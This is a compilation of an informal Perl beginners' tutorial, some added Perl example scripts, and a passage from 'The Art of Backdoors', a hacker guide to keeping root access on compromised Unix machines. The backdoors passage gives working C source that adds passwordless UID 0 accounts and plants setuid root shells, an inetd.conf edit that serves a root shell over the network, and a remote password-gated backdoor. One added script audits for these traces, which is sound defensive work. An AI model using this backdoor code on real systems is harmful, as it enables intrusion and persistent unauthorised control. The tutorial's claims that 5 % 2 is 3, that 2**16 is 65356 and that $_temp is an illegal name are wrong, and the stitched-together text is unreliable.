Perl (Practical Extraction and Reporting Language) is an INTERPRETED language designed by Larry Wall in the late 80's as a tool to create reports from many files on the UNIX operating system. As we learn more and more Perl, you will notice that many of its functions have to do with managing files, or manipulating or searching strings or patterns.
The fact that Perl is an interpreted language means that it does not need to be compiled or linked to be run; it's just a plain text file, like shell scripts. Unlike shell scripts, Perl offers the power and flexibility of high-level languages like C, but does an excellent job of simplifying many tasks. For example, Perl internally handles all variable types, so the same variable can be used to hold strings, integers or other data types. And you can forget about malloc(): Perl handles all memory internally. As you'll see, Perl is extremely easy to learn, especially if you have any experience with other programming languages. Heh, imagine.. even *I* learned Perl.

GETTING PERL:

Alright, in order to learn Perl, you need to get yourself the interpreter. It comes packaged with most Linux distributions. Check if you already have it:

-----------------------------
Dark@darkness Dark >$ perl -v

This is perl, version 5.005_03 built for i386-linux

Copyright 1987-1999, Larry Wall

Perl may be copied only under the terms of either the Artistic License or the
GNU General Public License, which may be found in the Perl 5.0 source kit.

Complete documentation for Perl, including FAQ lists, should be found on
this system using `man perl' or `perldoc perl'.  If you have access to the
Internet, point your browser at http://www.perl.com/, the Perl Home Page.
---------------------------

If you got a "command not found", you can try other search utilities like whereis, locate, or find (refer to the man pages if ya don't know how to use 'em). If you don't have Perl, run a search on freshmeat.net or another app finder to locate the latest version. For you guys stuck in Win9x (I pity you, really. Get Linux for God's sake!), you can go to www.activestate.com to get a version of perl that will work for you.

NOTE: Not all commands that work in *nix versions of Perl will work in the Win32 version (ex. getpwent(), and many of the file test functions). All perl scripts shown here are for the *nix version of perl.
PERL LESSON 1:

OK, now that we have perl up and running, let's start learning already. Perl programs, like the programs of all high-level programming languages, are made up of statements. Like in C, every Perl statement must end in a ; (semicolon), and white space is ignored. For example:

print "hello";      is a valid Perl statement.
print "hello" ;     is ALSO valid.
print; "hello"      INVALID.
print "hello"       INVALID (No semicolon).

Now, let's do everyone's first program in ANY new language, Hello World. (NOTE: Line numbers are for reference only, don't type 'em in)

1: #! /usr/bin/perl
2: print "Hello, World!\n";

Ok, type that in in your favorite plain text editor (vi, notepad, pico, whatever, as long as it saves in plain text), and save it. To run a perl script in *NIX:

Dark@darkness Dark >$ chmod +x hello.pl
Dark@darkness Dark >$ ./hello.pl
Hello, World!
Dark@darkness Dark >$

In Windows:

C:\> perl hello.pl
Hello, World!
C:\>

Alright, now let's take a look at the program....

LINE 1: #! /usr/bin/perl

That line contains the path to your Perl interpreter. ALL PERL PROGRAMS MUST START WITH THAT LINE. A program that doesn't start like that will not run correctly. Also, if you want to run the interpreter with some command line options, you would include them there. For example, it's good practice to run Perl with the -w switch, which increases the warnings on the scripts, which aids in debugging. To use the -w, change line 1 to:

#! /usr/bin/perl -w

LINE 2: print "Hello, World!\n";

There's our first Perl statement, a print command. The syntax for print (for now) is:

print "STRING";

Prints STRING to STDOUT. \n is known as an escape sequence. If you're familiar with C, you know that \n represents a New line character, which signals the end of a line of text on the screen.
There are several legal escape sequences in Perl; here are the more widely used ones:

\a   : Alarm (*beep*)
\t   : Tab
\n   : New line
\r   : Carriage Return
\0xx : ASCII code for a character in Octal notation
\xXX : ASCII code for a character in Hex.

There are a few other common ones, but those will be covered when we do Regular Expressions and Patterns.

Comments in Perl are created by the #, pound sign. When a # is reached, the rest of the line is skipped. Notice the # on the first line of all Perl programs: that makes the interpreter skip that line. That line is for the shell/operating system's use only.

#! /usr/bin/perl
# print "This line wont execute\n";
$scalar = "adfas";   # this is a partial line comment

Perl: Volume 2 - Variables & Operators

Traditionally, the second lesson in any programming language is variables and data storage. Today, we will explore the 3 Perl variable types: Arrays, Scalars, and Hashes (No, there will be no pot in the hash section). After we cover the data types, we will also discuss many of the simple operators Perl has to offer. After this lesson, you will know enough to make your own simple Perl programs.

NOTE: Complete mastery of these topics is REQUIRED to become a good Perl programmer, ESPECIALLY the section on arrays and hashes, since these are the main components of any complex data structure you will be creating in Perl.

ANOTHER NOTE: This volume is LONG (19 kb, four times more than the last one.), it took me three days to write it all. I recommend that you read the Variable section first, take a break, and then continue on to the operators. If you attempt to read this all in one sitting, you are either really bored, or have a LOT of free time on your hands.

FINAL NOTE BEFORE WE BEGIN: There are plenty of examples in this one; be sure to take a look at all of them and understand why they act the way they do. This will help you prevent many annoying bugs in your future programs.
(For each of the examples I included, I have made those mistakes in the past with similar code; I included them so you won't have to.)

------------------------------------------------------------------------

PERL VARIABLES:

Perl has 3 different kinds of variables: Scalars, Arrays and Hashes. Each of these can be used to hold numbers, integers, floating point numbers, characters, strings etc. People familiar with C will find this quite different from what they are used to: there are no variable "types". For example, a scalar can be first used to hold a number, and later, without any modification, can be reassigned to a string. To learn about the variable types, we need to know how to set them.

The = Operator:

The = operator assigns the value on the right to the variable on the left. In Perl, when you assign a value to a scalar, it ALWAYS must begin with a $ (dollar sign), array variables ALWAYS must begin with a @ (an "at" sign) and hashes ALWAYS must begin with a % (percentage sign). Strings should always be in double quotes ("") or single quotes (''), since single back quotes (``) have special meaning in Perl (that will be covered later). Numeric values don't need to be quoted.

-------------------------------------
NOTE: Variables in Perl are CASE SENSITIVE. $scalar, $SCALAR, and $ScALAR are *DIFFERENT* variables. Personally, I use variables that hold more permanent settings in all caps, while all regular variables are in lowercase.

NOTE: Also, variable names in Perl must be all alphanumeric characters (0-9, a-z, A-Z, _). The first letter in the variable name can't be a _. For example:

$address   LEGAL
$new!      NOT LEGAL
$_temp     NOT LEGAL

Variables that contain non-alphanumeric characters are set internally by Perl, such as $_, $<, $>, $| and $#array.

LAST NOTE: Perl uses a different variable space for each type of variable. You can have a scalar named $temp and an array named @temp defined at the same time: they won't interfere with each other.
-------------------------------------

SCALARS:

These variables hold single values or strings. For example:

<++> perl/scalars.pl
#! /usr/bin/perl -w

$scalar = "This is a scalar variable:";
$scalar2 = 3.1415926;
print "$scalar $scalar2\n";
<--> end scalars.pl

OUTPUT:

Dark@darkness work >$ chmod +x scalars.pl
Dark@darkness work >$ ./scalars.pl
This is a scalar variable: 3.1415926
Dark@darkness work >$

ARRAYS:

These variables hold more than one value, and are indexed by numbers.

NOTE: Array subscripts start counting, by default, at the number 0, like in many other languages. If you aren't used to counting up from 0, you can change this by setting the special $[ scalar to the value you want to count from. Special variables, such as $[, $_, and others, will be discussed in detail in another volume.

For example:

<++> perl/arrays.pl
#! /usr/bin/perl

@array = (2, 3, 4, "data", 34.023, "Im a 3l33t Perl h4x0r");
print "$array[0]\n\n";
print "$array[5]\n";
<--> end arrays.pl

OUTPUT:

Dark@darkness Dark >$ chmod +x arrays.pl
Dark@darkness Dark >$ ./arrays.pl
2

Im a 3l33t Perl h4x0r
Dark@darkness Dark >$

Some of the most observant ones of you might be asking "Why the hell is there a $ in front of the array name, if it's not a scalar??". This is a point of confusion to many people beginning in Perl. When you refer to the ENTIRE array, it is prefixed with a @. When you refer to individual elements of the array, they are prefixed with a $. You can assign values to members of an array like:

$array[100] = "This is a string";

Or you can assign the whole array at once using a LIST. Let's look at the declaration of @array in the previous example:

@array = (2, 3, 4, "data", 34.023, "Im a 3l33t Perl h4x0r");

This array is declared by a list. Lists are simply one or more values separated by commas. Some Perl docs you may read refer to strings as lists with only one member, which is also correct.

HASHES:

Now everyone's favorite variable type, the hash.
Hashes are the most powerful data type in Perl. Their use might not be apparent right away, but when you start programming more complicated programs, their existence will make your life SO much easier. A hash is exactly like an array, except that its values are indexed by strings, not numbers.

<++> perl/hash.pl
#! /usr/bin/perl

%hash = ("RED", 0xFF0000, "GREEN", 0x00FF00, "BLUE", 0x0000FF);
print "Red is: $hash{'RED'} in RGB\n";
print "Green is: $hash{'GREEN'} in RGB\n";
print "Blue is: $hash{'BLUE'} in RGB\n";
<--> end hash.pl

OUTPUT:

Dark@darkness Dark >$ chmod +x hash.pl
Dark@darkness Dark >$ ./hash.pl
Red is: 16711680 in RGB
Green is: 65280 in RGB
Blue is: 255 in RGB
Dark@darkness Dark >$

Hrmm.. something didn't go as planned.. in the hash declaration, we put 0xFF0000 as RED, but the print function printed "16711680". Why? In our declaration, 0xFF0000 was not quoted. Since it is a valid integer in hex, Perl changed it to decimal and then stored it into the hash. Then it was printed to stdout by print. How do we change this? In the declaration, quote the value for RED. This forces Perl to interpret it as a string, and it does not do the conversion.

OUTPUT:

Dark@darkness Dark >$ ./hash.pl
Red is: 0xFF0000 in RGB
Green is: 0x00FF00 in RGB
Blue is: 0x0000FF in RGB
Dark@darkness Dark >$

Earlier we used the hex values in "numeric context," meaning they were interpreted as numbers. The second time, they were used in string, or scalar, context, meaning they were interpreted as strings. The same values used in different contexts can have very different results. Here is another example using arrays:

<++> perl/context.pl
#! /usr/bin/perl

@array = (23, 156, "this is an array");
$scalar = @array;
$scalar2 = "@array";
print "$scalar\n";
print "$scalar2\n";
print "@array\n";
print "$array[0] $array[1] $array[2]\n";
<--> end context.pl

OUTPUT:

Dark@darkness Dark >$ chmod +x context.pl
Dark@darkness Dark >$ ./context.pl
3
23 156 this is an array
23 156 this is an array
23 156 this is an array
Dark@darkness Dark >$

Hrm.. that's strange.. we referred to the same array in different ways, but the first line looks different. Why? Let's look at how we use the variable..

$scalar = @array;
...
print "$scalar\n";

Here, we use @array in numeric context.. and set that value to $scalar. When an array name is used in numeric context, it returns the NUMBER OF MEMBERS OF THE ARRAY. THIS IS *NOT* THE SUBSCRIPT OF THE LAST ARRAY VALUE. The subscript of the last array value is @array - 1, which can also be obtained as $#array, a variable set internally by Perl that holds the subscript of the last array member. Ex: $members[$#members] returns the last member of array @members.

The $#array variable can be increased or decreased like any other variable, but changing its value ALSO CHANGES THE SIZE OF THE ARRAY. For example:

<++> perl/chsize.pl
#! /usr/bin/perl

@array = ("one", "two", "three");
$#array--;
print "@array\n";
<--> end chsize.pl

OUTPUT:

Dark@darkness Dark >$ chmod +x chsize.pl
Dark@darkness Dark >$ ./chsize.pl
one two
Dark@darkness Dark >$

Notice that the last member of the array is gone, since the array size was decreased.

FUNCTIONS THAT ACT ON VARIABLES:

Ok, now back to hashes.. Many of you might not immediately notice the importance of hashes, but let's explore them a bit more. We know that hashes are indexed by strings, and we also know that scalars and arrays can also hold strings... so we can do some nice stuff... things like $hash{"$scalar"}, which returns the hash value indexed with the key held in $scalar. If we use this convention, we might also need to know which keys exist in the hash.
This is accomplished by the keys() call.

SYNTAX: keys(%hash)
Returns a list of all keys in %hash. For example we can do:

@array = keys(%hash);

and then loop through the members of @array to find all the values in the hash.

We can also determine whether a key exists in a hash, with the exists() call.

SYNTAX: exists($hash{"key"})
Returns true if key exists in %hash, false otherwise. This is commonly used in conditional statements.

And we can also delete a key from a hash using, you guessed it, the delete() call.

SYNTAX: delete($hash{"key"})
Deletes key from %hash. After this is done, the value at that key will also be lost.

Scalars and arrays also have the same type of commands:

SYNTAX: defined($scalar), defined(@array);
Returns true if $scalar or @array exists, false otherwise. Also used in conditionals.

SYNTAX: undef($scalar), undef(@array);
Undefines $scalar or @array. Contents of each will be lost.

Undef is also used with many Perl functions that return lists. For example:

(undef, $file) = split(/=/, $scalar, 2);

This split call returns a two member list of values. If we only want the second one, we can discard the first by assigning it to undef, while keeping the second. Split will be covered later when we discuss regular expressions and string manipulation.

SYNTAX: $scalar = join("string", @array);
Converts an array into a single string, by joining all the members of the array, separating them by "string". For example:

<++> perl/join.pl
#! /usr/bin/perl

@array = ("a", "random", "array", "of", "values", 23);
$scalar = join("::", @array);
print "$scalar\n";
<--> end join.pl

OUTPUT:

Dark@darkness Dark >$ ./join.pl
a::random::array::of::values::23
Dark@darkness Dark >$

This function is mainly used to concatenate a whole array into a scalar to later print it to a sort of configuration file. Like, you have an array returned by getpwent(), and join it to create a copy of the /etc/passwd entry.
SPECIAL VARIABLES:

Perl has a LOT of special system variables which are automatically set at runtime. These variables control many aspects of the program, and also give the program access to operating system data.

@ARGV : Command line arguments

Like in many other languages, the @ARGV array holds the arguments given after the program name at the command line. Unlike in C, $ARGV[0] does NOT hold the program name; it holds the first argument after the program name. The name of the program is held in the special variable $0.

<++> perl/argv.pl
#! /usr/bin/perl

print "$0 @ARGV\n";
<--> end argv.pl

OUTPUT:

Dark@darkness Dark >$ ./argv.pl this is a test
./argv.pl this is a test
Dark@darkness Dark >$

%ENV : Environment Variables

This hash holds the names and values of all environment variables currently set. For example: $ENV{"PATH"} will return the contents of your PATH environment variable. Like any other hash, you can set new values in this one.

$ENV{"TESTER"} = "blah";

This code fragment sets a new environment variable named TESTER to the string "blah". The delete() and exists() functions can also be used on this hash.

%SIG : Signals

This hash is Perl's frontend for signal trapping. In later volumes, we will use references and this hash to create an unkillable process, and timeout counters.

$_ and @_ : Default pattern and search space

This is the mother of all Perl special variables. Inside a subroutine, @_ holds the arguments passed to the sub. When reading from a file, $_ is set to the data currently being read. If functions that regularly require a value to execute have that value omitted, they will use the contents of $_. For example:

<++> perl/mother.pl
#! /usr/bin/perl

$_ = "This is a test\n";
print;
<--> end mother.pl

OUTPUT:

Dark@darkness Dark >$ chmod +x mother.pl
Dark@darkness Dark >$ ./mother.pl
This is a test
Dark@darkness Dark >$

Just remember, when you aren't sure what data a function is working on, odds are that it is using $_ (or @_ inside a sub).
$< : Process UID

Since we are all interested in suid programs (hehe), I decided to include this one at the last minute. $< returns the numeric uid of the process. Like any other variable, it can be set to other values. For example:

$< = 0;

This code frag is identical to doing setuid(0) in C.

NOTE: Before you start making SUID root programs in Perl, let me warn you about something. Perl has a lot of security when it runs suid root; this security is called "taintedness". Later we will explore suid root programs and tainted variables, but until then, read: man perlsec.

OK, that's all I'm going to cover (for now) on Perl variables. I know it's a long ass section, but you need to know this stuff so you can start fooling around with real Perl programs.

-----------------------------------------------------------------------
If you haven't taken a little break yet, DO IT NOW! Now we are gonna talk Perl operators....
-----------------------------------------------------------------------

PERL OPERATORS:

OK.. that mostly covers Perl data types.. now that we are all rested we will list many of the basic operators Perl offers.

++, --   Increment and Decrement
USAGE: $scalar++; ++$scalar; $scalar--; --$scalar;

Increases or decreases the value of $scalar.

NOTE: If the operator appears before the variable name, the variable is incremented (or decremented) before it is used. If the operator is after the variable, it is incremented (or decremented) after the variable is used. This is only important if the increment or decrement is embedded in other Perl statements. When used alone, it really doesn't matter which convention you use.

*, /, -, +, %   Multiplication, Division, Subtraction, Addition and Modulo
USAGE: $scalar = 4 * 25; $scalar = 100 % 13; etc etc..

Performs the mathematical function depending on the symbol. I don't really think I need to show many examples of this.... most of you can add anyway ;) Modulo might be a bit unknown. It returns the remainder of the division of the two operands.
For example: 5 % 2 return 3, because 5 divided by 2 is 1 remainder 3. It's most commonly used to print text after a set number of iterations of a loop. An example of this will be given when we cover conditionals and loops in the next volume.

**   Exponentiation
USAGE: $scalar = 5 ** 2;

Returns the value of the first operand to the power of the second. For example: $scalar = 2 ** 16; returns 65356, 2 to the power of 16.

.   Concatenation Operator
USAGE: $scalar = "string1" . "string2"; $scalar = $var . $var2;

This operator basically smushes both operands together into one string. For example: "one" . "two"; returns "onetwo". This is useful to combine the values of different scalars into one. Kinda like strcat() in C.

------------------------------------------------------------------
NOTE: The above operators (except ++ and --) can be written in shorthand. For example:

$var = $var + 20;         is equivalent to   $var += 20;
$var %= 3;                is equal to        $var = $var % 3;
$var++;                   is equal to        $var += 1;
$var = $var . "string";   is equal to        $var .= "string";

If you don't notice the pattern yet, msg me on IRC or email me =)
------------------------------------------------------------------

..   Sequence Operator
USAGE: @array = (a .. z);

This is one of my favorite operators, mainly because it turns a really long ass line of code into a simple statement. It returns a list of all values between the operands. For example:

@array = (a .. z);
print "@array\n";

This snippet of code prints out: a b c d e f g h i j k l m n o p q r s t u v w x y z. All of the values between the operand "a" and the operand "z". This also works for numbers, floating point numbers, etc etc. I mostly use this in foreach loops, which we will cover next volume.

x   Repetition operator
USAGE: $scalar = "--" x 2;

Repeats the STRING the number of times given by the integer. EX: "xy" x 3; returns "xyxyxy".

&&, ||, !   Logical AND, OR, NOT

These are usually used in conditionals, loops, or error checking.
These will be discussed in more detail next volume.

&, |, ^, <<, >>   Bitwise AND, OR, XOR, Left shift, Right shift

These operators modify the operands at the binary level. The only time I *EVER* use these is to decode the return codes of a stat() call, or for encryption schemes. I won't be covering these, but you can read your Perl documentation for more info (man perlop).

OK, that somewhat covers most of the operators we will be using in our tutorials. I left some out, such as ?:, =~, !~, \, ->, and // because they will better fit when we discuss their corresponding topics. Play around with these operators; some can give you unexpected, but kewl results.. for example.. try using ++ and -- on a scalar that holds the string "aa" or something similar.

---------------------------------------------------------------------------

Alright, that concludes this volume of the Perl tutorial.. I know it's quite long, but you won't see another one till mid August since I'm going on vacation (wooohooo).

Today we covered:

  The 3 types of Perl variables
  How to set variables
  Variable context
  Array sizes
  keys(), exists(), defined(), and other functions that act on variables
  Special Perl variables
  Basic Perl operators

Play around with some of the stuff we talked about and you should know enough to make simple Perl programs. For example try a line like this in your code:

$scalar = `/bin/date`;
print "$scalar\n";

(THOSE ARE SINGLE BACK QUOTES)

Perl is a language where EVERYTHING can be done in more than one way; mess around with what you already know, and you might come up with something cool.

Laterz,
Darkmo0n

If ya have any suggestions, comments, or source code you want to contribute, drop me a note at perl@whereipretendtowork.com or talk to me on irc.

NEXT VOLUME: Conditional statements and Loops.
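The variable-context, hash-function and operator sections of this volume, worked through in one added script. This is not code from Darkmo0n's tutorial; all of its data is constructed, and it uses `use strict` and `my`, which the tutorial has not covered yet.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# --- Arrays: numeric context vs string context, and $#array ---
my @array = (23, 156, "this is an array");   # constructed sample data
my $count = @array;           # numeric context: number of members, 3
my $last  = $#array;          # subscript of the last member, 2
my $text  = "@array";         # string context: members joined by spaces
print "count=$count last_index=$last last_member=$array[$last]\n";
print "interpolated: $text\n";

$#array--;                    # lowering $#array throws away the last member
print "after \$#array--: @array (", scalar(@array), " members)\n";

# --- Hashes: quoted vs unquoted values, keys(), exists(), delete() ---
my %colour = ("RED", 0xFF0000, "GREEN", "0x00FF00", "BLUE", 0x0000FF);
# RED and BLUE were unquoted, so Perl stored them as the numbers 16711680
# and 255; GREEN was quoted, so it is stored as the string "0x00FF00".
foreach my $key (sort keys(%colour)) {
    print "$key => $colour{$key}\n";
}

my $wanted = "GREEN";         # a key looked up through a scalar
print "GREEN exists\n" if exists($colour{$wanted});
delete($colour{$wanted});
print "GREEN is gone\n" unless exists($colour{$wanted});

# --- join() and split(): list <-> delimited scalar, with undef placeholders ---
my @pwent = ("nobody", "x", 65534, 65534, "Nobody", "/", "/bin/false");
my $entry = join(":", @pwent);                     # one /etc/passwd-style line
print "$entry\n";
my (undef, undef, $uid) = split(/:/, $entry, 4);   # keep only the third field
print "uid field is $uid\n";

# --- Operators: modulo, exponent, repetition, range, string increment ---
print "5 % 2 = ", 5 % 2, "\n";       # remainder 1, since 5 = 2*2 + 1
print "2 ** 16 = ", 2 ** 16, "\n";   # 65536
print "-" x 20, "\n";                # a 20-character rule
my @letters = ("a" .. "e");          # the range operator on strings
print "@letters\n";
my $s = "aa";
$s++;                                # the ++ "magic" on strings: "aa" becomes "ab"
print "\"aa\"++ gives $s\n";
```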
The Art of Backdoors
=-=+=-=+=-=+=-=+=-=+=-=+=-=+=-=

By Meb (Meb_@Piratededucation.com)
Http://TriadSecurity.sacone.com/

This article is intended to teach you how to maintain root after you have gained it. It is definitely from the hacker's perspective, but could also be viewed from the admin's perspective, on how to detect these backdoors and remove them. This article is not comprehensive, because there are so many ways to leave backdoors I could not possibly cover them all, but I'm sure it should explain certain methods and techniques for you to use.

You've been trying to get into this box for a couple weeks, you've got your hands on an acc but the privs are terrible. The box is well known around to be very secure, but now you know just how good the admin is. You've tried everything, imap, nis, suid exploits, bad permissions, race conditions, but nothing is working. Finally you stumble onto something which the admin overlooked and are quickly sitting on a root shell. But what now? How do you keep this accomplishment you've worked so long on?

[Basics]

-1. You can add a UID 0 account to the passwd file. This is not recommended because when the admin views the file, it will be incredibly obvious that his box has been compromised, and you will probably lose your root position. Here's a short C prog I wrote which will add a UID 0 acc to /etc/passwd.

<++> backdoor/backdoor1.c
#include <stdio.h>

main()
{
    FILE *fd;
    fd=fopen("/etc/passwd","a+");
    fprintf(fd,"hax0r::0:0::/root:/bin/sh\n");
}
<-->

In a similar attempt you could enable an abandoned account, change its uid to 0 and change the * in the second field. This method would obviously be less obtrusive than the first.

-2. Leave a suid shell in /tmp. Once the file is run you will have root privs again. This is everyone's favorite, but many boxes run cronjobs every couple hours or when they reboot to clean out tmp; also many boxes don't allow suid files to be executed.
You can of course remove all these setbacks by editing /var/spool/cron/crontabs/root and /etc/fstab. Here's a little program that makes a suid shell called out in /tmp.

<++> backdoor/backdoor2.c
#include <stdlib.h>

main()
{
    system("cp /bin/sh /tmp/out");
    system("chown root.root /tmp/out");
    system("chmod 4755 /tmp/out");
}
<-->

[Intermediate]

The super-server configuration file is not the first place an admin will look, so obviously it is a good place to put a backdoor. But what makes these backdoors best is that they're remote, so you don't have to have a local account to regain root.

First, some background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the appropriate program (usually a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical lines look like this:

(1)    (2)     (3)  (4)     (5)   (6)              (7)
ftp    stream  tcp  nowait  root  /usr/etc/ftpd    ftpd
talk   dgram   udp  wait    root  /usr/etc/ntalkd  ntalkd

1: This is the daemon name of the service that appears in /etc/services. This tells inetd what to look for in /etc/services to determine which port it should associate the program name with.

2: This will tell inetd what type of connection to use when the session is established. TCP uses streams, and UDP (the connectionless protocol) uses datagrams.

3: Protocol field, TCP or UDP.

4: This will tell inetd what the importance of the daemon is. A 'wait' flag indicates that the server will process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a child process to handle the connection, and then go back to sleep, waiting for further connections.

5: Is the user the daemon is run as.

6: Program to run when a connection arrives.

7: is the actual command (and optional arguments).

If the program is trivial (usually requiring no user interaction) inetd may handle it internally. This is done with an 'internal' flag in fields (6) and (7).
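The admin's counterpart to the two file formats described so far, added here as an example and not part of Meb's article: it parses constructed samples of /etc/passwd (the [Basics] UID 0 account) and of /etc/inetd.conf (the 7-field layout above) and flags the entries those backdoors leave behind. The samples are embedded inline and made up; nothing is read from the running system.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Constructed sample of /etc/passwd: a legitimate root entry, a second UID 0
# account with an empty password field, and an old account re-enabled with uid 0.
my $passwd_sample = <<'END';
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
hax0r::0:0::/root:/bin/sh
oldguy:x:0:100:Old Guy:/home/oldguy:/bin/sh
END

# Constructed sample of /etc/inetd.conf in the 7-field layout: an unchanged ftp
# line, a normal 'internal' daytime line, a daytime line whose server has been
# swapped for a shell (and has lost its user field), and a made-up service name.
my $inetd_sample = <<'END';
ftp      stream tcp nowait root /usr/etc/ftpd ftpd
daytime  stream tcp nowait root internal
daytime  stream tcp nowait /bin/sh sh -i
backdoor stream tcp nowait root /bin/sh -i
END

# Constructed stand-in for /etc/services: only the names this check needs.
my %known_service = map { $_ => 1 } qw(ftp telnet talk daytime);

# An interactive shell is never a legitimate server program for inetd.
my %is_shell = map { $_ => 1 } qw(/bin/sh /bin/csh /bin/bash /bin/ksh);

# Returns one warning string per suspicious /etc/passwd entry.
sub audit_passwd {
    my ($text) = @_;
    my @warnings;
    foreach my $line (split /\n/, $text) {
        next if $line =~ /^\s*(#|$)/;                  # skip comments and blanks
        my ($user, $pw, $uid, $gid) = split /:/, $line;
        next unless defined $gid;                       # malformed line
        push @warnings, "$user: UID 0 but not root"   if $uid eq "0" && $user ne "root";
        push @warnings, "$user: GID 0 but not root"   if $gid eq "0" && $user ne "root";
        push @warnings, "$user: empty password field" if $pw eq "";
    }
    return @warnings;
}

# Returns one warning string per suspicious /etc/inetd.conf entry.
sub audit_inetd {
    my ($text) = @_;
    my @warnings;
    foreach my $line (split /\n/, $text) {
        next if $line =~ /^\s*(#|$)/;
        my ($svc, $type, $proto, $wait, $user, $server, @args) = split ' ', $line;
        push @warnings, "$svc: service name not in /etc/services" unless $known_service{$svc};
        next if defined $server && $server eq "internal";   # handled by inetd itself
        # Field 5 must be a user name; a path there means a field was dropped.
        push @warnings, "$svc: user field '$user' looks like a program path" if $user =~ m{^/};
        my $prog = $user =~ m{^/} ? $user : $server;
        push @warnings, "$svc: server program is a shell ($prog)" if defined $prog && $is_shell{$prog};
        push @warnings, "$svc: interactive shell flag -i in arguments" if grep { $_ eq "-i" } @args;
    }
    return @warnings;
}

print "passwd:\n";
print "  $_\n" foreach audit_passwd($passwd_sample);
print "inetd.conf:\n";
print "  $_\n" foreach audit_inetd($inetd_sample);
```

The suid shell left in /tmp leaves no trace in either file; that one is found by listing setuid files (find / -perm -4000 -user root) and comparing the result with a known-good list.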
So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it with something else. You could make it spawn a program that adds a UID 0 acc, or creates a suid shell. To take over a service like daytime and, instead of telling you the time, have it drop you to a suid root shell, try something like this. Change the line in /etc/inetd.conf that looks like this:

daytime stream tcp nowait root internal

And change it to:

daytime stream tcp nowait /bin/sh sh -i

Now you've done this, so you decide to go test it out. You try and it says "Unable to establish connection", what's wrong? Well in order for these changes to take place you need to restart inetd; you could wait for the box to reboot, but who's patient? Just do a "killall -9 inetd" and it will automatically restart itself.

Another thing you could do is make a fake service and make it spawn a program which would be more secure, such as password protected, and have better options, so that you would have the power to modify the system further remotely without the difficulties of not running off of telnetd. Here is a program that will bind to any port and wait; it will not give a prompt, simply put in the password and you will be given a menu of options. This code was written by theft shortly before he left the scene so it might have a few bugs in it as well as some unworking functions.

<++> backdoor/remoteback.c
/*
   Coders: Theft
   Help from: Sector9, Halogen
   Greets:
     People: Liquid, AntiSocial, Peak, Grimknight, s0ttle, halogen, Psionic, g0d, Psionic.
     Groups: Ethical Mutiny Crew(EMC), Common Purpose hackers(CPH), Global Hell(gH),
             Team Sploit, Hong Kong Danger Duo, Tg0d, EHAP.

   Usage:
     Setup:
       # gcc -o backhore backhore.c
       # ./backdoor password &
     Run:
       Telnet to the host on port 4000. After connected you
       Will not be prompted for a password, this way it is less
       Obvious, just type the password and press enter, after this
       You will be prompted for a command, pick 1-8.

   Distributers: Ethical Mutiny Crew
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>

#define PORT 4000
#define MAXDATASIZE 100
#define BACKLOG 10
#define SA struct sockaddr /* leaner meaner code */

void handle(int);

int main(int argc, char *argv[])
{
    int sockfd, new_fd, sin_size, numbytes, cmd;
    char ask[10]="Command: ";
    char *bytes, *buf, pass[40];
    struct sockaddr_in my_addr;
    struct sockaddr_in their_addr;

    printf("\n Backhore BETA by Theft\n");
    printf(" 1: trojans rc.local\n");
    printf(" 2: sends a systemwide message\n");
    printf(" 3: binds a root shell on port 2000\n");
    printf(" 4: creates suid sh in /tmp\n");
    printf(" 5: creates mutiny account uid 0 no passwd\n");
    printf(" 6: drops to suid shell\n");
    printf(" 7: information on backhore\n");
    printf(" 8: contact\n");

    if (argc != 2) {
        fprintf(stderr,"Usage: %s password\n", argv[0]);
        exit(1);
    }
    strncpy(pass, argv[1], 40);
    printf("..using password: %s..\n", pass);

    if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("socket");
        exit(1);
    }
    my_addr.sin_family = AF_INET;
    my_addr.sin_port = htons(PORT);
    my_addr.sin_addr.s_addr = INADDR_ANY;

    if (bind(sockfd, (SA *)&my_addr, sizeof(SA)) == -1) {
        perror("bind");
        exit(1);
    }
    if (listen(sockfd, BACKLOG) == -1) {
        perror("listen");
        exit(1);
    }
    sin_size = sizeof(SA);

    while(1) { /* main accept() loop */
        if ((new_fd = accept(sockfd, (SA *)&their_addr, &sin_size)) == -1) {
            perror("accept");
            continue;
        }
        if (!fork()) {
            dup2(new_fd, 0);
            dup2(new_fd, 1);
            dup2(new_fd, 2);
            fgets(buf, 40, stdin);
            if (!strcmp(buf, pass)) {
                printf("%s", ask);
                cmd = getchar();
                handle(cmd);
            }
            close(new_fd);
            exit(0);
        }
        close(new_fd);
        while(waitpid(-1,NULL,WNOHANG) > 0); /* rape the dying children */
    }
}

void handle(int cmd)
{
    FILE *fd;

    switch(cmd) {
    case '1':
        printf("\nBackhore BETA by Theft\n");
        printf("theft@cyberspace.org\n");
        printf("Trojaning rc.local\n");
        fd = fopen("/etc/passwd", "a+");
        fprintf(fd, "mutiny::0:0:ethical mutiny crew:/root:/bin/sh");
        fclose(fd);
        printf("Trojan complete.\n");
        break;
    case '2':
        printf("\nBackhore BETA by Theft\n");
        printf("theft@cyberspace.org\n");
        printf("Sending systemwide message..\n");
        system("wall Box owned via the Ethical Mutiny Crew");
        printf("Message sent.\n");
        break;
    case '3':
        printf("\nBackhore BETA by Theft\n");
        printf("theft@cyberspace.org\n");
        printf("\nAdding inetd backdoor... (-p)\n");
        fd = fopen("/etc/services","a+");
        fprintf(fd,"backdoor\t2000/tcp\tbackdoor\n");
        fd = fopen("/etc/inetd.conf","a+");
        fprintf(fd,"backdoor\tstream\ttcp\tnowait\troot\t/bin/sh -i\n");
        execl("killall", "-HUP", "inetd", NULL);
        printf("\ndone.\n");
        printf("telnet to port 2000\n\n");
        break;
    case '4':
        printf("\nBackhore BETA by Theft\n");
        printf("theft@cyberspace.org\n");
        printf("\nAdding Suid Shell... (-s)\n");
        system("cp /bin/sh /tmp/.sh");
        system("chmod 4700 /tmp/.sh");
        system("chown root:root /tmp/.sh");
        printf("\nSuid shell added.\n");
        printf("execute /tmp/.sh\n\n");
        break;
    case '5':
        printf("\nBackhore BETA by Theft\n");
        printf("theft@cyberspace.org\n");
        printf("\nAdding root account... (-u)\n");
